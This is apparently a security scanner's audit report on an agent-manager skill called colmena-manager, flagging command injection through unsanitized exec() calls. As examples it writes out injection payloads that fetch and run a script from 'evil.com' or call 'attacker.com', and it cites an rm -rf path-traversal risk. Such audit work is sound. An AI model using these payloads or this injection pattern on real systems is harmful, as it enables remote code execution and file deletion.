Skill Trust Decision

colmena-manager

Skill presents as a legitimate OpenClaw agent manager but contains multiple command-injection vulnerabilities from unsanitized user-controlled input piped into shell commands, with shell execution entirely undeclared in documentation.

Install decision first
Source: Manual upload
Scanned: Apr 4, 2026
Files: 5
Artifacts: 3
Violations: 2
Findings: 6
Most direct threat evidence

01 Attacker registers a malicious agent with shell metacharacters in the ID (e.g., 'vision; wget http://evil.com/sh.sh|bash') (Reconnaissance · src/index.js)
02 Victim runs 'colmena-manager health-check' to monitor the hive (Entry · src/index.js)
03 healthCheck() calls exec() with ps aux | grep ${agent.id}, where agent.id contains unsanitized shell metacharacters from step 1 (Escalation · src/index.js)

Why this conclusion was reached

3/4 dimensions flagged

Block · Declared vs actual capability
2 undeclared or violating capabilities were inferred.

Block · Hidden execution and egress
1 high-risk artifact or egress signal was extracted.

Block · Attack chain and severe findings
The report includes 4 attack-chain steps and 3 severe findings.

Pass · Dependencies and supply chain hygiene
Dependencies are present but no obvious high-risk issue stands out.

Attack Chain

01 Attacker registers a malicious agent with shell metacharacters in the ID (e.g., 'vision; wget http://evil.com/sh.sh|bash')
Reconnaissance · src/index.js:12

02 Victim runs 'colmena-manager health-check' to monitor the hive
Entry · src/index.js:120

03 healthCheck() calls exec() with ps aux | grep ${agent.id}, where agent.id contains unsanitized shell metacharacters from step 1
Escalation · src/index.js:131

04 Shell injection executes arbitrary commands (download + execute remote script) with the permissions of the running user
Impact · src/index.js:131

What drove the risk score up

Undeclared shell execution +15

SKILL.md describes only OpenClaw API calls (agents_list, sessions_list, sessions_send) but never mentions exec() shell commands used throughout src/index.js

Command injection — agentId +15

agentId from API responses is interpolated into shell commands in logs() (line 66), healthCheck() (line 131), and checkMemory() (line 162) without sanitization

Command injection — workspace name +10

workspace name (user-controlled CLI argument) is directly interpolated into rm -rf command in workspaceRemove() (line 193); path traversal possible

Missing allowed-tools declaration +5

Neither SKILL.md nor claws.json declares shell:WRITE or filesystem:WRITE permissions required by the exec() calls

Hardcoded user path dependency +3

All paths hardcoded to /home/nvi/ — a specific user account not mentioned as a prerequisite

Non-existent HEARTBEAT.md referenced +2

SKILL.md advertises HEARTBEAT.md for automatic 30-min health checks but the file does not exist in the project

Most important evidence

High · RCE · Command injection via agentId in multiple exec() calls

The agentId parameter (sourced from the agents_list API response) is directly interpolated into shell commands via template literals in three separate locations: logs() at line 66, healthCheck() at line 131, and checkMemory() at line 162. An attacker who registers a malicious agent with shell metacharacters in the ID (e.g., 'main; curl http://attacker.com') can achieve arbitrary command execution on the host when any of these commands are invoked.

Location: src/index.js:66
Remediation: Validate agentId against a strict alphanumeric/whitelist pattern before using in any shell command. Use OpenClaw's native session API instead of shell tail for log retrieval.

High · RCE · Command injection via workspace name in rm -rf

The workspace name argument passed to workspaceRemove() is directly interpolated into an rm -rf shell command without sanitization. While the base path /home/nvi/.openclaw/workspace- provides some containment, path traversal sequences like '../../../' could escape the intended directory and delete arbitrary files on the system as the executing user.

Location: src/index.js:193
Remediation: Validate workspace name against a strict pattern (e.g., /^[a-z0-9-]+$/). Use Node.js fs.rmSync() with a verified absolute path instead of shell rm. Add a confirmation prompt before destructive operations.

High · Doc Mismatch · Shell execution completely absent from SKILL.md

SKILL.md's API section lists only OpenClaw native functions (agents_list, sessions_list, sessions_send, message, exec/process). It never discloses that exec() is used to run arbitrary shell commands (tail, ps, grep, awk, ls, mkdir, rm). Users deploying this skill have no indication it requires shell:WRITE permissions or executes system commands.

Location: SKILL.md:55
Remediation: SKILL.md must explicitly declare shell:WRITE permission and list each shell command used. Users must give informed consent before a skill can execute system commands.

Medium · Doc Mismatch · Referenced HEARTBEAT.md does not exist

SKILL.md advertises an automatic heartbeat script (HEARTBEAT.md) that runs every 30 minutes for health monitoring. This file is referenced in both SKILL.md and README.md but does not exist in the project. This is either an incomplete feature or documentation that overstates capabilities.

Location: SKILL.md:64
Remediation: Either implement HEARTBEAT.md or remove all references to it from documentation. If implemented, declare its resource requirements explicitly.

Medium · Priv Escalation · No allowed-tools declaration despite full shell/filesystem access

claws.json and SKILL.md do not declare any allowed-tools. The skill uses exec() for shell:WRITE operations (tail, ps, grep, awk, ls, mkdir, rm) and filesystem:WRITE operations (mkdir, rm -rf) across multiple methods. These permissions are entirely absent from any manifest, preventing the host AI from properly scoping the skill's capabilities.

Location: claws.json:1
Remediation: Add an allowed-tools declaration to claws.json: {"tools": [{"name": "Bash", "resource": "shell", "level": "WRITE"}, {"name": "Write", "resource": "filesystem", "level": "WRITE"}]}

Low · Sensitive Access · Hardcoded /home/nvi/ path creates dependency on specific user account

All file operations (logs, workspaces) hardcode /home/nvi/ as the base path. This is not declared as a prerequisite, and the path does not appear in SKILL.md requirements. The skill will silently fail on systems where this user does not exist.

Location: src/index.js:66
Remediation: Derive the OpenClaw data directory from an environment variable (e.g., OPENCLAW_HOME or XDG_DATA_HOME) or make it a configurable parameter.

Declared capability vs actual capability

Shell · Block
Declared: NONE · Inferred: WRITE
Evidence: src/index.js:66 exec with tail | src/index.js:131 exec with ps|grep | src/index.js:162 exec with ps|grep|awk | src/index.js:193 exec with rm

Filesystem · Block
Declared: NONE · Inferred: WRITE
Evidence: src/index.js:188 mkdir via exec | src/index.js:193 rm -rf via exec

Skill Invoke · Pass
Declared: NONE · Inferred: READ
Evidence: src/index.js:13 agents_list, sessions_list, sessions_send — matches SKILL.md API section

Suspicious artifacts and egress

Critical · Dangerous Command · rm -rf / · src/index.js:193

Medium · External URL · https://clawhub.com/colmena-manager · claws.json:15

Info · Email · [email protected] · claws.json:18

Dependencies and supply chain

Package: openclaw · Version: >=1.0.0 · Source: npm (peer dep) · Known vuln: No · Notes: Peer dependency, not bundled. No known vulnerabilities.

File composition

5 files · 552 lines
JavaScript: 1 file · 289 lines
Markdown: 2 files · 211 lines
JSON: 2 files · 52 lines

Files of concern · 3

src/index.js (JavaScript · 289 lines): Command injection via agentId in multiple exec() calls · Command injection via workspace name in rm -rf · Hardcoded /home/nvi/ path creates dependency on specific user account · rm -rf /
SKILL.md (Markdown · 175 lines): Shell execution completely absent from SKILL.md · Referenced HEARTBEAT.md does not exist
claws.json (JSON · 31 lines): No allowed-tools declaration despite full shell/filesystem access · https://clawhub.com/colmena-manager · [email protected]
Other files: README.md · package.json

Security positives

Skill implements its stated functionality (agent management) without additional hidden data exfiltration
No base64-encoded payloads or obfuscated code blocks found
No credential harvesting from ~/.ssh, ~/.aws, or .env files
No network requests to external IPs detected
No reverse shell, C2, or data theft mechanisms present
No cron/scheduled task persistence mechanisms found
No malicious dependencies detected; package.json has minimal legitimate dependencies